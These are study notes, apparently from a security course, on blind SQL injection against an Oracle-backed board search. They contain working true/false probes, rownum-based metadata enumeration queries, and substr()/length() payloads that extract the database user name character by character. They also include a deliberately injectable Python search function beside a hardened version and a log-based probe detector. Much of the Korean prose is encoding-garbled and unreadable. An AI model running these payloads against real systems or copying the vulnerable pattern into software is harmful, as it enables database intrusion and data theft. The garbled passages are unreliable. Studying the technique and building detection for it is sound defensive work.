
Oracle Blind Based

Contents Based

Whether the reference string test is printed or not: 1=1 and title (true) versus 1=2 and title (false)

search_type=1=1+andtitle&keyword=test		# true  : the reference string test is printed
search_type=1=2+andtitle&keyword=test		# false : the reference string test is not printed
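Added example (not from the original post): the injectable search pattern above, where search_type is spliced straight into the WHERE clause, beside a hardened version that picks the column from an allowlist and binds the keyword. SQLite stands in for Oracle so the snippet runs offline; the table name board and the columns title/content are assumed.

```python
import sqlite3

# Constructed rows standing in for the board the post queries (SQLite is used
# only so this runs offline; the post's target is Oracle).
SAMPLE_ROWS = [
    ("test post", "first"),
    ("another test", "second"),
    ("unrelated", "third"),
]

# Allowlist: the only values search_type may take, mapped to real column names.
SEARCH_COLUMNS = {
    "title": "title",
    "content": "content",
}


def _connect():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE board (title TEXT, content TEXT)")
    conn.executemany("INSERT INTO board VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def search_vulnerable(search_type, keyword):
    """Mirrors the post's injectable pattern: search_type and keyword are
    concatenated into the SQL text, so '1=1 and title' / '1=2 and title'
    flip the WHERE clause between always-true and always-false."""
    sql = f"SELECT title FROM board WHERE {search_type} LIKE '%{keyword}%'"
    conn = _connect()
    try:
        return sorted(row[0] for row in conn.execute(sql))
    finally:
        conn.close()


def is_allowed_search_type(search_type):
    """True only for values present in the allowlist."""
    return search_type in SEARCH_COLUMNS


def search_hardened(search_type, keyword):
    """Column chosen from the allowlist; keyword passed as a bind parameter,
    so user input can never change the statement structure."""
    if not is_allowed_search_type(search_type):
        raise ValueError(f"unsupported search_type: {search_type!r}")
    column = SEARCH_COLUMNS[search_type]
    sql = f"SELECT title FROM board WHERE {column} LIKE ?"
    conn = _connect()
    try:
        return sorted(row[0] for row in conn.execute(sql, (f"%{keyword}%",)))
    finally:
        conn.close()


if __name__ == "__main__":
    print(search_vulnerable("1=1 and title", "test"))   # true branch: rows come back
    print(search_vulnerable("1=2 and title", "test"))   # false branch: nothing
    print(search_hardened("title", "test"))             # same result, no oracle
```

The hardened form removes the true/false oracle entirely: an unknown search_type is rejected before any SQL is built, and the keyword can only ever be a LIKE pattern value, never part of the statement.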
Blind Based

์„œ๋ฒ„์˜ ์ฐธ/๊ฑฐ์ง“์— ์‘๋‹ต๊ฐ’์„ ๊ฐ€์ง€๊ณ  ๋ฌธ์ž์—ด์„ ์œ ์ถ”

Three search strategies

1. Sequential search

2. Binary search

3. Bit-operation search


Non-sequential search ( metadata lookup )

# 1. Count the user accounts
SELECT count(*) FROM (SELECT rownum r, owner FROM (SELECT DISTINCT owner FROM all_tables)) WHERE owner like '%C##%';
# rownum is used to return only one row ( one record and one column )
# However, since this extraction happens in a blind setting, a non-sequential lookup is needed,
# so the statement below is used instead.
SELECT count(*) FROM (SELECT DISTINCT owner FROM all_tables) WHERE owner like '%C##%';

# 2. Return a user account
SELECT owner FROM (SELECT rownum r, owner FROM (SELECT DISTINCT owner FROM all_tables WHERE owner like '%C##%')) WHERE r=1;
SELECT owner FROM (SELECT rownum r, owner FROM all_tables WHERE owner like '%C##%') WHERE r=1;	# DISTINCT is not strictly needed here, so it is dropped

2. Non-sequential enumeration of the C##KITRI account's tables

2-1 Guess the target table with '%%' and count how many tables match

SELECT count(*) FROM (SELECT rownum r,table_name FROM all_tables WHERE owner='C##KITRI' and table_name like '%MEM%');

2-2  If exactly one table matched, query that table's name

SELECT table_name FROM all_tables WHERE owner='C##KITRI' and table_name like '%MEM%';

์˜ค๋ผํด ํ•จ์ˆ˜ ์‚ฌ์šฉ๋ฒ•

MYSQL		:	length(test);	์ถœ๋ ฅ ๊ฒฐ๊ณผ : 4
Oracle		:	length(test);	์ถœ๋ ฅ ๊ฒฐ๊ณผ : 4

Count(*)๋„ ๋™์ผ
# ๋‹ค๋งŒ ORACLE์—์„œ๋Š” SUBSTR์„ ์‚ฌ์šฉํ•œ๋‹ค


3. Non-sequential enumeration of the C##KITRI account's columns

3-1 Guess the target column with '%%' and count how many columns match

SELECT count(*) FROM (SELECT rownum r,column_name FROM all_tab_columns WHERE owner='C##KITRI' and table_name='MEMBERS' and column_name like '%ID%');

3-2  If exactly one column matched, query that column's name


๋ธ”๋ผ์ธ๋“œ ํ”„๋กœ์„ธ์Šค

1. ํ•ด๋‹น ๊ณ„์ • ๋ฐ ํ…Œ์ด๋ธ”,์ปฌ๋Ÿผ ๊ฐœ์ˆ˜(count(*))๋ฅผ ์ฐพ๋Š”๋‹ค. ๋‹จ, ๊ธฐ๋ณธ์ •๋ณด 3๊ฐ€์ง€๋Š” 1๊ฐœ ์ด๋ฏ€๋กœ ๊ฐœ์ˆ˜๋ฅผ ์ฐพ์„ ํ•„์š” ์—†์Œ

2. ํ•ด๋‹น ๊ณ„์ • ๋ฐ ํ…Œ์ด๋ธ”, ์ปฌ๋Ÿผ์˜ ์ด๋ฆ„์„ (like'%%') ๋ฌธ์ž๋กœ ์œ ์ถ”ํ•œ๋‹ค

3. ํ•ด๋‹น ๋ฌธ์ž์˜ ๊ธ€์ž์ˆ˜(length())๋ฅผ ์œ ์ถ”ํ•œ๋‹ค.

4. ์ˆœ์ฐจํƒ์ƒ‰, ์ด์ง„ํƒ์ƒ‰, ๋น„ํŠธ ์—ฐ์‚ฐ ํƒ์ƒ‰(substr())์„ ์ด์šฉํ•˜์—ฌ ํ•˜๋‚˜ํ•˜๋‚˜ ์ฐธ/๊ฑฐ์ง“ ๊ฐ’์„ ๋ฝ‘์•„๋‚ธ๋‹ค.

5. ์กฐํ•ฉํ•œ๋‹ค.
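Added example (not from the original post), written from the monitoring side: every step of the process above costs the attacker one request per true/false check, so a blind enumeration leaves a burst of requests carrying substr(), length(), rownum, from dual, all_tables/all_tab_columns or 1=1/1=2 in the query string. The code below parses constructed access-log lines, decodes the query string, tags those markers and flags any client that sends several such requests inside a short window. The log lines, the /board path, the thresholds and the marker list are all assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import unquote_plus

# Constructed access-log lines (Combined Log Format, not real traffic). The
# query strings mirror the probes the post walks through; 10.0.0.7 is a normal user.
SAMPLE_LOG = """\
10.0.0.7 - - [06/Jul/2022:10:00:01 +0900] "GET /board?search_type=title&keyword=test HTTP/1.1" 200 512
10.0.0.9 - - [06/Jul/2022:10:00:02 +0900] "GET /board?search_type=1%3D1+and+title&keyword=test HTTP/1.1" 200 512
10.0.0.9 - - [06/Jul/2022:10:00:03 +0900] "GET /board?search_type=1%3D2+and+title&keyword=test HTTP/1.1" 200 300
10.0.0.9 - - [06/Jul/2022:10:00:04 +0900] "GET /board?search_type=length((SELECT+user+FROM+dual))%3D8+and+title&keyword=test HTTP/1.1" 200 512
10.0.0.9 - - [06/Jul/2022:10:00:05 +0900] "GET /board?search_type=substr((SELECT+user+FROM+dual),1,1)%3D'C'+and+title&keyword=test HTTP/1.1" 200 512
10.0.0.9 - - [06/Jul/2022:10:00:06 +0900] "GET /board?search_type=substr((SELECT+user+FROM+dual),2,1)%3D'%23'+and+title&keyword=test HTTP/1.1" 200 512
10.0.0.9 - - [06/Jul/2022:10:00:07 +0900] "GET /board?search_type=(SELECT+count(*)+FROM+(SELECT+DISTINCT+owner+FROM+all_tables))%3D2+and+title&keyword=test HTTP/1.1" 200 512
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

# Markers taken from the blind-enumeration statements in the post.
MARKERS = {
    "substr": re.compile(r"\bsubstr\s*\(", re.I),
    "length": re.compile(r"\blength\s*\(", re.I),
    "rownum": re.compile(r"\brownum\b", re.I),
    "metadata": re.compile(r"\ball_tab(?:les|_columns)\b", re.I),
    "from_dual": re.compile(r"\bfrom\s+dual\b", re.I),
    "tautology": re.compile(r"\b1\s*=\s*[12]\b"),
}


def parse_line(line):
    """Return (ip, timestamp, decoded query string), or None for unparsable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, _method, path, _status, _size = m.groups()
    when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    query = unquote_plus(path.partition("?")[2])  # '+' and %XX decoded
    return ip, when, query


def classify_query(query):
    """Sorted names of the markers present in a decoded query string."""
    return sorted(name for name, rx in MARKERS.items() if rx.search(query))


def find_blind_probers(log_text, threshold=3, window_seconds=60):
    """Map IP -> number of marker-bearing requests, for IPs that sent at least
    `threshold` such requests inside any `window_seconds` span."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, when, query = parsed
        if classify_query(query):
            hits[ip].append(when)
    window = timedelta(seconds=window_seconds)
    flagged = {}
    for ip, times in hits.items():
        times.sort()
        for i in range(len(times) - threshold + 1):
            if times[i + threshold - 1] - times[i] <= window:
                flagged[ip] = len(times)
                break
    return flagged


if __name__ == "__main__":
    for ip, n in find_blind_probers(SAMPLE_LOG).items():
        print(f"{ip}: {n} blind-injection style probes")
```

The rate check matters more than any single marker: a lone length() in a query is easy to dismiss, but a client that alternates 1=1/1=2 and then walks substr() positions in sequence is following exactly the five-step process described above.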


์‚ฌ์šฉ์ž ์ด๋ฆ„ ์ฐพ๊ธฐ

1. ๊ธฐ๋ณธ 3๊ฐ€์ง€ ๋ชฉ๋กํ™” ไธญ ์‚ฌ์šฉ์ž ์ด๋ฆ„ ์ฐพ๊ธฐ ( SID๋ฅผ ์œ ์ถ”ํ•˜์—ฌ XE๋ฅผ ๋ฐํ˜”๋‹ค๋Š” ๊ฐ€์ • ํ•˜ ์ง„ํ–‰ )

๊ธฐ๋ณธ ๊ตฌ๋ฌธ : SELECT user FROM dual
์œ ์ถ” ๊ตฌ๋ฌธ : length((SELECT user FROM dual))=8	# ๊ธฐ์ค€๋ฌธ์ž match๊ฐ€ ๋œ๋‹ค

# ํƒ์ƒ‰ ๊ตฌ๋ฌธ
substr((SELECT user FROM dual),1,1)='C'
substr((SELECT user FROM dual),2,1)='#'
substr((SELECT user FROM dual),3,1)='#'
substr((SELECT user FROM dual),4,1)='K'
substr((SELECT user FROM dual),5,1)='I'
substr((SELECT user FROM dual),6,1)='T'
substr((SELECT user FROM dual),7,1)='R'
substr((SELECT user FROM dual),8,1)='I'
# ์‚ฌ์šฉ์ž ๊ณ„์ •์€ ๋ชจ๋‘ ๋Œ€๋ฌธ์ž

2. ์‚ฌ์šฉ์ž ๊ณ„์ •๋“ค์„ ๋ฉ”ํƒ€ ๋ฐ์ดํ„ฐ ๋ชฉ๋กํ™” ์ง„ํ–‰

๊ธฐ๋ณธ ๊ตฌ๋ฌธ : SELECT DISTINCT owner FROM all_tables;
๊ฐœ์ˆ˜ ๊ตฌ๋ฌธ : (SELECT count(*) FROM (SELECT DISTINCT owner FROM all_tables WHERE owner like '%C##%'))=2
# > 2๊ฐœ ์ถœ๋ ฅ๋œ๋‹ค - rownum์„ ์‚ฌ์šฉํ•ด์•ผํ•œ๋‹ค

# ์œ ์ถ” ๊ตฌ๋ฌธ
length((SELECT owner FROM (SELECT rownum r, owner FROM (SELECT DISTINCT owner FROM all_tables WHERE owner like '%C##%')) WHERE r=1))=8

# ํƒ์ƒ‰ ๊ตฌ๋ฌธ
substr((SELECT owner FROM (SELECT rownum r, owner FROM (SELECT DISTINCT owner FROM all_tables WHERE owner like '%C##%')) WHERE r=1),1,1)='C'
